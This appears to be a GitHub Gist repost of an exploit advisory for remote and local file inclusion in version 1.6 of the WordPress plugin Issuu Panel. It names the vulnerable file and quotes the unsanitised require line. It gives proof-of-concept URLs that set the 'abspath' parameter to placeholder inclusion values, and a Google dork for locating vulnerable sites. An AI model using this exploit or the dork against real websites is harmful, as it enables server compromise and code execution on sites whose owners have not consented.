Skip to content

Instantly share code, notes, and snippets.

@CCrashBandicot
Created March 31, 2016 01:44
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save CCrashBandicot/a398da1756b2daa8c2e4bdcf381a8fba to your computer and use it in GitHub Desktop.
Save CCrashBandicot/a398da1756b2daa8c2e4bdcf381a8fba to your computer and use it in GitHub Desktop.
# Exploit Title: Wordpress Plugin Issuu Panel - RFI & LFI
# Exploit Author: CrashBandicot
# Date: 2016-03-23
# Google Dork : inurl:/wp-content/plugins/issuu-panel/
# Vendor Homepage: https://wordpress.org/plugins/issuu-panel/
# Tested on: MsWIn
# Version: 1.6
# Vulnerable File : menu/documento/requests/ajax-docs.php
3. require($_GET['abspath'] . '/wp-load.php');
# PoC : http://127.0.0.1/wordpress/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=[RFI]
http://127.0.0.1/wordpress/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=[LFI]
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment